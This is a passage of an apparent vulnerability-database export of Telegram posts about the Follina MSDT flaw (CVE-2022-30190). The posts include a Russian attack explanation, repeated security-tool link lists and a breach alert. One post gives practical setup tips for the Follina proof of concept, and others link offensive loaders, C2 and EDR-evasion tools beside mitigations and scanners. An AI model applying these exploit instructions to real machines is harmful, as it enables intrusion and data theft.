\u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u043e\u0439 \u0443\u0433\u0440\u043e\u0437\u044b. 
\u041d\u043e \u0435\u0441\u043b\u0438 \u043f\u043e\u0434\u0441\u0443\u043d\u0443\u0442\u044c \u0435\u043c\u0443 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office, \u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0441\u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 URI-\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 \u00absearch-ms\u00bb, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u043c \u0438 HTML-\u0441\u0441\u044b\u043b\u043a\u0430\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043d\u0430\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u043f\u043e\u0438\u0441\u043a \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435. \u0422\u0430\u043a\u0438\u0435 \u043f\u043e\u0438\u0441\u043a\u043e\u0432\u044b\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043c\u043e\u0433\u0443\u0442 \u043e\u0431\u0440\u0430\u0449\u0430\u0442\u044c\u0441\u044f \u0432\u043d\u0443\u0442\u0440\u044c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u043d\u043e \u00ab\u041f\u043e\u0438\u0441\u043a Windows\u00bb \u0440\u0430\u0441\u0448\u0438\u0440\u044f\u0435\u0442 \u0438\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438. 
\u041e\u043d \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u0449\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u044b, \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0435 \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445.\n\n\u041a\u0430\u043a \u044d\u0442\u043e \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c?\n\n\u0425\u0430\u043a\u0435\u0440 \u0441\u043e\u0437\u0434\u0430\u0451\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office \u0438 \u043a\u0430\u043a-\u0442\u043e \u0435\u0433\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u2014 \u0447\u0435\u0440\u0435\u0437 \u0441\u0430\u0439\u0442\u044b, \u0441\u043e\u0446\u0441\u0435\u0442\u0438, \u0442\u043e\u0440\u0440\u0435\u043d\u0442-\u0440\u0430\u0437\u0434\u0430\u0447\u0438. \u0425\u043e\u0442\u044f \u0441\u0430\u043c\u044b\u043c \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u043c \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u043c \u0432\u0441\u0451 \u0435\u0449\u0451 \u043e\u0441\u0442\u0430\u0451\u0442\u0441\u044f e-mail-\u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0430 \u0441 \u0432\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c\u0438 \u0444\u0430\u0439\u043b\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u043e\u043f\u0440\u043e\u0432\u043e\u0436\u0434\u0430\u044e\u0442\u0441\u044f \u043a\u043b\u0430\u0441\u0441\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u043f\u043e\u0434\u0432\u043e\u0434\u043a\u043e\u0439, \u0447\u0442\u043e\u0431\u044b \u043f\u0440\u0438\u0432\u043b\u0435\u0447\u044c \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435. 
\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440: \u00ab\u0421\u0440\u043e\u0447\u043d\u043e \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0439 \u043a\u043e\u043d\u0442\u0440\u0430\u043a\u0442. \u0417\u0430\u0432\u0442\u0440\u0430 \u0435\u0433\u043e \u043d\u0443\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u0442\u044c\u00bb.\n\n\u0417\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0441\u0441\u044b\u043b\u043a\u0443 \u043d\u0430 HTML-\u0444\u0430\u0439\u043b, \u0432\u043d\u0443\u0442\u0440\u0438 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f JavaScript-\u043a\u043e\u0434. \u042d\u0442\u043e\u0442 \u043a\u043e\u0434 \u043a\u0430\u043a \u0440\u0430\u0437 \u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u2014 \u043e\u043d \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0447\u0435\u0440\u0435\u0437 MSDT \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0434\u0430\u043d\u043d\u044b\u043c. 
\u0415\u0441\u043b\u0438 \u0430\u0442\u0430\u043a\u0430 \u043f\u0440\u043e\u0448\u043b\u0430 \u0443\u0441\u043f\u0435\u0448\u043d\u043e, \u0445\u0430\u043a\u0435\u0440 \u0441\u043c\u043e\u0436\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b, \u043f\u0440\u043e\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c, \u043c\u0435\u043d\u044f\u0442\u044c \u0438\u043b\u0438 \u0443\u0434\u0430\u043b\u044f\u0442\u044c \u0444\u0430\u0439\u043b\u044b, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u043d\u043e\u0432\u044b\u0435 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u044b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435.", "creation_timestamp": "2025-01-14T13:04:32.000000Z"}, {"uuid": "33958720-f6a3-4b56-b450-7b50ca966dec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3028", "content": "Tools - Hackers Factory \n\nAwesome Web3 hacking/security\n\nhttps://github.com/ManasHarsh/Awesome-Web3-security\n\nEducational Heap Exploitation\n\nThis repo is for learning various heap exploitation techniques. We use Ubuntu's Libc releases as the gold-standard. Each technique is verified to work on corresponding Ubuntu releases. \n\nYou can run apt source libc6 to download the source code of the Libc your are using on Debian-based operating system. You can also click \u25b6\ufe0f to debug the technique in your browser using gdb.\n\nhttps://github.com/shellphish/how2heap\n\n\u200bFastFinder\n\nIncident Response - Fast Suspicious File Finder.\n\nLightweight tool made for threat hunting, live forensics, and triage on both Windows and Linux Platforms. 
It is focused on endpoint enumeration and suspicious file finding based on various criteria:\n\n\u25ab\ufe0f file path/name\n\u25ab\ufe0f md5 / sha1 / sha256 checksum\n\u25ab\ufe0f simple string content match\n\u25ab\ufe0f complex content condition(s) based on YARA\n\nhttps://github.com/codeyourweb/fastfinder\n\n\u200bCVE-2022-30190 Follina POC\n\nHost exploit.html on localhost, port 80. Open the docx to pop calc.\n\nTo change the remote address the doc points to, open in 7Z and edit word\\rels\\document.xml.rels to point to a new location. YOU MUST keep the exclamation mark. It will literally not run if you omit this from the end of the URL.\n\nThe exploit must contain at least 3541 characters before the window.location.href, and they must be within the script tag. There is about 6000 or so included in the exploit.html\n\nhttps://github.com/onecloudemoji/CVE-2022-30190\n\n\u200bDaily updated proxy lists\n\nFor scraping and other information gathering automations:\n\nhttps://github.com/clarketm/proxy-list\nhttps://github.com/TheSpeedX/PROXY-List\nhttps://github.com/ShiftyTR/Proxy-List\nhttps://github.com/jetkai/proxy-list\n\nSocks5 for Telegram:\nhttps://github.com/hookzof/socks5_list \n\nfire\n\nfire is a simple tool meant to work in a pipeline of other scripts. It takes domains on stdin and outputs them on stdout if they resolve. The inspiration for this work is the filter-resolved Golang code in this repository. That repo is not updated in a long time and I thought that it was time to switch to the new Golang paradigm of modules. 
I also added a Dockerfile.\n\nhttps://github.com/thelicato/fire\n\n\u200bWindows-exploits\n\nhttps://github.com/lyshark/Windows-exploits\n\n\u200btoolbox-pentest-web\n\nEven though this box is primarily intended for offensive operation, many tools and scripts can also be used for defensive purposes, for example, in CI/CD pipelines as security validation.\n\nhttps://github.com/righettod/toolbox-pentest-web\n\n\u200bKaynStrike\n\nA User Defined Reflective Loader for #Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.\n\nhttps://github.com/Cracked5pider/KaynStrike\n\nsabre-ng\n\nFlexible C2 framework for Nation State Simulations in #RedTeam Assessments.\n\nhttps://github.com/aidden-laoch/sabre\n\n\u200bSplunk Security Content\n\nThis project gives you access to our repository of Analytic Stories, security guides that provide background on tactics, techniques and procedures (TTPs), mapped to the MITRE ATT&amp;CK Framework, the Lockheed Martin Cyber Kill Chain, and CIS Controls. \n\nThey include Splunk searches, machine learning algorithms and Splunk Phantom playbooks (where available)\u2014all designed to work together to detect, investigate, and respond to threats.\n\nhttps://github.com/splunk/security_content\n\n\u200bHyperDbg Debugger\n\nOpen-source, community-driven, hypervisor-assisted, user-mode and kernel-mode Windows debugger with a focus on using modern hardware technologies. 
It is a debugger designed for analyzing, fuzzing and reversing.\n\nhttps://github.com/HyperDbg/HyperDbg\n\nssc-reading-list\n\nA reading list for software supply-chain security.\n\nhttps://github.com/chainguard-dev/ssc-reading-list\n\n\u200bArsenal\n\nJust a quick inventory, reminder and launcher for pentest commands.\n\nThis project written by pentesters for pentesters simplify the use of all the hard-to-remember commands\n\nhttps://github.com/Orange-Cyberdefense/arsenal\n\n#pentesting #redteam\n\nhttps://t.me/dilagrafie", "creation_timestamp": "2023-05-20T10:35:54.000000Z"}, {"uuid": "48717c24-0d80-4f80-9ba6-5e0ec9b1679d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/WARLOCK_DARK_ARMY_OFFICIALS/65", "content": "MSDT ZERO-DAY\n\nhttps://github.com/PwnC00re/PoC-CVE-2022-30190\n\n\ud83c\udfa9WARLOCK DARK ARMY OFFICIALS \ud83c\udfa9\n\n#exploit #zeroday #poc", "creation_timestamp": "2022-09-12T17:53:36.000000Z"}, {"uuid": "29bd9245-99d0-4139-8ea2-6735798a35a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/breachdetector/93760", "content": "\u26a0 Detectada filtraci\u00f3n \u26a0\n{\n  \"site\": \"Sinister.ly\",\n  \"Threat Actor\": \"hacxx\",\n  \"Content\": \"Hacxx MSDT 0-Day CVE-2022-30190 Exploit Generator\",\n  \"Detection Date\": \"06 Jun 2022 16:01\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 Data Leak monitoring system\ud83d\udd39", "creation_timestamp": "2022-06-06T16:03:49.000000Z"}, {"uuid": "1adbcb08-ab9b-4789-baa6-c283a5db17d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": 
"https://t.me/dilagrafie/3124", "content": "AnoMark\n\nThis algorithm is a Machine Learning one, using Natural Language Processing (NLP) techniques based on Markov Chains and n-grams. It offers a way to train a theoretical model on command lines  datasets considered clean. Once done it can detect malicious command lines on other datasets.\n\nhttps://github.com/ANSSI-FR/AnoMark\n\n#cybersecurity #infosec\n\n\u200b\u200bCVE-2023-32117\n\nIntegrate Google Drive &lt;= 1.1.99 - Missing Authorization via REST API Endpoints.\n\nhttps://github.com/RandomRobbieBF/CVE-2023-32117\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bGeoPincer\n\nA script that leverages OpenStreetMap's Overpass API in order to search for locations. These locations will be queried using a collection of establishments that are somewhat adjacent.\n\nhttps://github.com/tloja/GeoPincer\n\n#OSINT #cybersecurity #infosec\n\n\u200b\u200bAwesome Industrial Protocols\n\nCompilation of industrial network protocols resources focusing on offensive security.\n\n\u2022 You are currently viewing the Awesome Industrial Protocols page.\n\u2022 etailed pages for protocols are available in protocols.\n\u2022 All data is stored in MongoDB databases in db.\n\u2022 Turn/IP (in srcs) is a handy tool to manipulate this data, generate the awesome list and protocol pages, and simplify the research and test process on industrial protocols\n\nhttps://github.com/Orange-Cyberdefense/awesome-industrial-protocols\n\n#cybersecurity #infosec\n\n\u200b\u200bCVE-2023-36884-Checker\n\nScript to check for CVE-2023-36884 hardening.\n\nhttps://github.com/tarraschk/CVE-2023-36884-Checker\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bAlcatraz\n\nA x64 binary obfuscator that is able to obfuscate various different pe files including:\n\n\u2022 .exe\n\u2022 .dll\n\u2022 .sys\n\nhttps://github.com/weak1337/Alcatraz\n\n#infosec #pentesting #redteam\n\n\u200b\u200bCobalt Strike BOFs\n\nBeacon object files I made to use with 
#CobaltStrike.\n\nhttps://github.com/Und3rf10w/CobaltStrikeBOFs\n\n#infosec #pentesting #redteam\n\n\u200b\u200bWindows 11 Exploits\n\nCVE-2023-24892, CVE-2023-33131, CVE-2022-30129, CVE-2023-33137, CVE-2023-33145, CVE-2023-33148, CVE-2022-30190.\n\nhttps://github.com/nu11secur1ty/Windows11Exploits\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bADHunt v2.0\n\nA tool for enumerating Active Directory Enviroments looking for interesting AD objects, vulnerabilities, and misconfigurations. It currently uses a combination ldap queries and available tooling. It was built as a follow up to LinWinPwn.\n\nhttps://github.com/Auto19/ADHunt\n\n#infosec #pentesting #redteam\n\n\u200b\u200bIAMActionHunter\n\nIAMActionHunter is an IAM policy statement parser and query tool aims to simplify the process of collecting and understanding permission policy statements for users and roles in AWS Identity and Access Management (IAM). Although its functionality is straightforward, this tool was developed in response to the need for an efficient solution during day-to-day AWS penetration testing.\n\nhttps://github.com/RhinoSecurityLabs/IAMActionHunter\n\n#cybersecurity #infosec #pentesting\n\n\u200b\u200bSysPlant\n\nA small implementation in NIM of the currently known syscall hooking methods.\n\nhttps://github.com/x42en/sysplant\n\n#infosec #pentesting #redteam\n\n\u200b\u200bUnshackle\n\nOpen-source tool to bypass windows and linux passwords from bootable usb.\n\nhttps://github.com/Fadi002/unshackle\n\n#infosec #pentesting #redteam\n\n\u200b\u200bCASR\n\nCollect crash reports, triage, and estimate severity.\n\nhttps://github.com/ispras/casr\n\n#cybersecurity #infosec\n\n\u200b\u200bCVE-2023-27163\n\nTo assist in enumerating the webserver behind the webserver SSRF.\n\nhttps://github.com/seanrdev/cve-2023-27163\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bCS2BR BOF\n\nYou would like to execute BOFs written for #CobaltStrike in #BruteRatel C4? Look no further, we got you covered! 
CS2BR implements a compatibility-layer that make CS BOFs use the BRC4 API. This allows you to use the vast landscape that is BOFs in BRC4.\n\nhttps://github.com/NVISOsecurity/cs2br-bof\n\nDetails:\nhttps://blog.nviso.eu/2023/07/17/introducing-cs2br-pt-ii-one-tool-to-port-them-all/\n \n#infosec #pentesting #redteam\n\n\u200b\u200bhypobrychium\n\nAV/EDR completely ignore me. Duplicate the token of a running process and run a command.\n\nhttps://github.com/foxlox/hypobrychium\n\n#cve #infosec\n\n2/3", "creation_timestamp": "2023-07-22T17:37:23.000000Z"}, {"uuid": "067549eb-d70b-4199-80b7-0bb8e4873834", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3035", "content": "Tools - Hackers Factory \n\nVigil\n\nFirewall/IDS Project.\n\nFeatures:\n\u25ab\ufe0f Packet capturing using the libpcap library\n\u25ab\ufe0f Basic rules for signature based attack identification\n\u25ab\ufe0f Logging\n\u25ab\ufe0f Remote login shell\n\u25ab\ufe0f Statistics\n\nhttps://github.com/raging-loon/Vigil\n\nbadkeys\n\nTool and library to check cryptographic public keys for known vulnerabilities\n\nhttps://github.com/badkeys/badkeys\n\nResearch:\nhttps://fermatattack.secvuln.info\n\nPersistBOF \n\nTool To Help Automate Common Persistence Mechanisms.\n\nA tool to help automate common persistence mechanisms. 
Currently supports Print Monitor (SYSTEM), Time Provider (Network Service), Start folder shortcut hijacking (User), and Junction Folder (User)\n\nhttps://github.com/IcebreakerSecurity/PersistBOF\n\n\u200bIRIS\n\nWeb collaborative platform aiming to help incident responders sharing technical details during investigations.\n\nhttps://github.com/dfir-iris/iris-web\n\n\u200b\u200bThrough the Wire\n\nThrough the Wire is a proof of concept exploit for CVE-2022-26134, an OGNL injection vulnerability affecting Atlassian Confluence Server and Data Center versions &lt;= 7.13.6 LTS and &lt;= 7.18.0 \"Latest\". This was originally a zero-day exploited in-the-wild.\n\n\u25ab\ufe0f Vendor advisory\n\u25ab\ufe0f Volexity \"in-the-wild\" write-up\n\u25ab\ufe0f Rapid7 write-up\n\nThrough the Wire implements two different exploits. The reverse shell will shell out to bash and therefore be more likely to be detected. The file reader executes from memory and is therefore unlikely to be detected. The exploits only work on Linux installs of Confluence. They could work on Windows but I'm also lazy.\n\nhttps://github.com/jbaines-r7/through_the_wire\n\nmitigate-folina\n\nMitigates the \"Folina\"-ZeroDay (CVE-2022-30190)\n\nThis script will backup and then remove the affected registry key (as suggested by Microsoft) to mitigate CVE-2022-30190). If parameterized with \"-revert\" the script will reimport the key. 
This can be used when Microsoft releases a patch.\n\nScript must be run as administrator or NT-AUTHORITY\\SYSTEM\n\nhttps://github.com/derco0n/mitigate-folina\n\nResearch:\nhttps://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/\n\n\u200bFollinaScanner\n\nA tool written in Go that scans files &amp; directories for the #Follina exploit (CVE-2022-30190)\n\nhttps://github.com/ErrorNoInternet/FollinaScanner\n\n\u200bUnlicense\n\nA #Python 3 tool to dynamically unpack executables protected with Themida/WinLicense 2.x and 3.x.\n\nWarning: This tool will execute the target executable. Make sure to use this tool in a VM if you're unsure about what the target executable does.\n\nFeatures:\n\u25ab\ufe0f Handles Themida/Winlicense 2.x and 3.x\n\u25ab\ufe0f Handles 32-bit and 64-bit PEs (EXEs and DLLs)\n\u25ab\ufe0f Handles 32-bit and 64-bit .NET assemblies (EXEs only)\n\u25ab\ufe0f Recovers the original entry point (OEP) automatically\n\u25ab\ufe0f Recovers the (obfuscated) import table automatically\n\nhttps://github.com/ergrelet/unlicense\n\n\u200bChainsaw\n\nRapidly Search and Hunt through Windows Event Logs\n\nChainsaw provides a powerful \u2018first-response\u2019 capability to quickly identify threats within Windows event logs. 
It offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in detection logic and via support for Sigma detection rules.\n\nFeatures:\nSearch and extract event log records by event IDs, string matching, and regex patterns\nHunt for threats using Sigma detection rules and custom built-in detection logic\nLightning fast, written in rust, wrapping the EVTX parser library by OBenamram\nDocument tagging (detection logic matching) provided by the TAU Engine Library\nOutput in an ASCII table format, CSV format, or JSON format\n\nhttps://github.com/Countercept/chainsaw\n\n\u200bADeleg\n\nIs an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest, along with their potential issues:\n\n\u25ab\ufe0f Objects owned by users\n\u25ab\ufe0f Objects with ACEs for users\n\u25ab\ufe0f Non canonical ACL\n\u25ab\ufe0f Disabled ACL inheritance\n\u25ab\ufe0f Default ACL modified in schema\n\u25ab\ufe0f Deleted delegation trustees\n\nhttps://github.com/mtth-bfft/adeleg", "creation_timestamp": "2023-05-21T09:47:13.000000Z"}, {"uuid": "b287b5f2-0ebc-4832-b02b-8c07cbb67373", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2859", "content": "Tools - Hackers Factory \n\nVigil\n\nFirewall/IDS Project.\n\nFeatures:\n\u25ab\ufe0f Packet capturing using the libpcap library\n\u25ab\ufe0f Basic rules for signature based attack identification\n\u25ab\ufe0f Logging\n\u25ab\ufe0f Remote login shell\n\u25ab\ufe0f Statistics\n\nhttps://github.com/raging-loon/Vigil\n\nbadkeys\n\nTool and library to check cryptographic public keys for known vulnerabilities\n\nhttps://github.com/badkeys/badkeys\n\nPersistBOF \n\nTool To Help Automate Common Persistence Mechanisms.\n\nA tool to help automate 
common persistence mechanisms. Currently supports Print Monitor (SYSTEM), Time Provider (Network Service), Start folder shortcut hijacking (User), and Junction Folder (User)\n\nhttps://github.com/IcebreakerSecurity/PersistBOF\n\n\u200bIRIS\n\nWeb collaborative platform aiming to help incident responders sharing technical details during investigations.\n\nhttps://github.com/dfir-iris/iris-web\n\n\u200b\u200bThrough the Wire\n\nThrough the Wire is a proof of concept exploit for CVE-2022-26134, an OGNL injection vulnerability affecting Atlassian Confluence Server and Data Center versions &lt;= 7.13.6 LTS and &lt;= 7.18.0 \"Latest\". This was originally a zero-day exploited in-the-wild.\n\n\u25ab\ufe0f Vendor advisory\n\u25ab\ufe0f Volexity \"in-the-wild\" write-up\n\u25ab\ufe0f Rapid7 write-up\n\nThrough the Wire implements two different exploits. The reverse shell will shell out to bash and therefore be more likely to be detected. The file reader executes from memory and is therefore unlikely to be detected. The exploits only work on Linux installs of Confluence. They could work on Windows but I'm also lazy.\n\nhttps://github.com/jbaines-r7/through_the_wire\n\nmitigate-folina\n\nMitigates the \"Folina\"-ZeroDay (CVE-2022-30190)\n\nThis script will backup and then remove the affected registry key (as suggested by Microsoft) to mitigate CVE-2022-30190). If parameterized with \"-revert\" the script will reimport the key. 
This can be used when Microsoft releases a patch.\n\nScript must be run as administrator or NT-AUTHORITY\\SYSTEM (can be deployed via GPP as a startscript or scheduled task)\n\nhttps://github.com/derco0n/mitigate-folina\n\n\u200bFollinaScanner\n\nA tool written in Go that scans files &amp; directories for the #Follina exploit (CVE-2022-30190)\n\nhttps://github.com/ErrorNoInternet/FollinaScanner\n\n\u200bUnlicense\n\nA #Python 3 tool to dynamically unpack executables protected with Themida/WinLicense 2.x and 3.x.\n\nWarning: This tool will execute the target executable. Make sure to use this tool in a VM if you're unsure about what the target executable does.\n\nFeatures:\n\u25ab\ufe0f Handles Themida/Winlicense 2.x and 3.x\n\u25ab\ufe0f Handles 32-bit and 64-bit PEs (EXEs and DLLs)\n\u25ab\ufe0f Handles 32-bit and 64-bit .NET assemblies (EXEs only)\n\u25ab\ufe0f Recovers the original entry point (OEP) automatically\n\u25ab\ufe0f Recovers the (obfuscated) import table automatically\n\nhttps://github.com/ergrelet/unlicense\n\n\u200bChainsaw\n\nRapidly Search and Hunt through Windows Event Logs\n\nChainsaw provides a powerful \u2018first-response\u2019 capability to quickly identify threats within Windows event logs. It offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in detection logic and via support for Sigma detection rules.\n\nFeatures:\nSearch and extract event log records by event IDs, string matching, and regex patterns\nHunt for threats using Sigma detection rules and custom built-in detection logic\nLightning fast, written in rust, wrapping the EVTX parser library by OBenamram\nDocument tagging (detection logic matching) provided by the TAU Engine Library\nOutput in an ASCII table format, CSV format, or JSON format\n\nhttps://github.com/Countercept/chainsaw\n\n\u200bADeleg\n\nIs an Active Directory delegation management tool. 
It allows you to make a detailed inventory of delegations set up so far in a forest, along with their potential issues:\n\n\u25ab\ufe0f Objects owned by users\n\u25ab\ufe0f Objects with ACEs for users\n\u25ab\ufe0f Non canonical ACL\n\u25ab\ufe0f Disabled ACL inheritance\n\u25ab\ufe0f Default ACL modified in schema\n\u25ab\ufe0f Deleted delegation trustees\n\nhttps://github.com/mtth-bfft/adeleg\n\n#cybersecurity #infosec #cybersec", "creation_timestamp": "2023-04-05T13:06:20.000000Z"}, {"uuid": "c01d4dfc-a3f9-4ed9-aea9-ae0458330604", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2848", "content": "Tools - Hackers Factory \n\nAwesome Web3 hacking/security\n\nhttps://github.com/ManasHarsh/Awesome-Web3-security\n\nEducational Heap Exploitation\n\nThis repo is for learning various heap exploitation techniques. We use Ubuntu's Libc releases as the gold-standard. Each technique is verified to work on corresponding Ubuntu releases. \n\nYou can run apt source libc6 to download the source code of the Libc your are using on Debian-based operating system. You can also click \u25b6\ufe0f to debug the technique in your browser using gdb.\n\nhttps://github.com/shellphish/how2heap\n\n\u200bFastFinder\n\nIncident Response - Fast Suspicious File Finder.\n\nLightweight tool made for threat hunting, live forensics, and triage on both Windows and Linux Platforms. It is focused on endpoint enumeration and suspicious file finding based on various criteria:\n\n\u25ab\ufe0f file path/name\n\u25ab\ufe0f md5 / sha1 / sha256 checksum\n\u25ab\ufe0f simple string content match\n\u25ab\ufe0f complex content condition(s) based on YARA\n\nhttps://github.com/codeyourweb/fastfinder\n\n\u200bCVE-2022-30190 Follina POC\n\nHost exploit.html on localhost, port 80. 
Open the docx to pop calc.\n\nTo change the remote address the doc points to, open in 7Z and edit word\\rels\\document.xml.rels to point to a new location. YOU MUST keep the exclamation mark. It will literally not run if you omit this from the end of the URL.\n\nThe exploit must contain at least 3541 characters before the window.location.href, and they must be within the script tag. There is about 6000 or so included in the exploit.html\n\nhttps://github.com/onecloudemoji/CVE-2022-30190\n\n\u200bDaily updated proxy lists\n\nFor scraping and other information gathering automations:\n\nhttps://github.com/clarketm/proxy-list\nhttps://github.com/TheSpeedX/PROXY-List\nhttps://github.com/ShiftyTR/Proxy-List\nhttps://github.com/jetkai/proxy-list\n\nSocks5 for Telegram:\nhttps://github.com/hookzof/socks5_list \n\nfire\n\nfire is a simple tool meant to work in a pipeline of other scripts. It takes domains on stdin and outputs them on stdout if they resolve. The inspiration for this work is the filter-resolved Golang code in this repository. That repo is not updated in a long time and I thought that it was time to switch to the new Golang paradigm of modules. 
I also added a Dockerfile.\n\nhttps://github.com/thelicato/fire\n\n\u200bWindows-exploits\n\nhttps://github.com/lyshark/Windows-exploits\n\n\u200btoolbox-pentest-web\n\nEven though this box is primarily intended for offensive operation, many tools and scripts can also be used for defensive purposes, for example, in CI/CD pipelines as security validation.\n\nhttps://github.com/righettod/toolbox-pentest-web\n\n\u200bKaynStrike\n\nA User Defined Reflective Loader for #Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.\n\nhttps://github.com/Cracked5pider/KaynStrike\n\nsabre-ng\n\nFlexible C2 framework for Nation State Simulations in #RedTeam Assessments.\n\nhttps://github.com/aidden-laoch/sabre\n\n\u200bSplunk Security Content\n\nThis project gives you access to our repository of Analytic Stories, security guides that provide background on tactics, techniques and procedures (TTPs), mapped to the MITRE ATT&amp;CK Framework, the Lockheed Martin Cyber Kill Chain, and CIS Controls. \n\nThey include Splunk searches, machine learning algorithms and Splunk Phantom playbooks (where available)\u2014all designed to work together to detect, investigate, and respond to threats.\n\nhttps://github.com/splunk/security_content\n\n\u200bHyperDbg Debugger\n\nOpen-source, community-driven, hypervisor-assisted, user-mode and kernel-mode Windows debugger with a focus on using modern hardware technologies. 
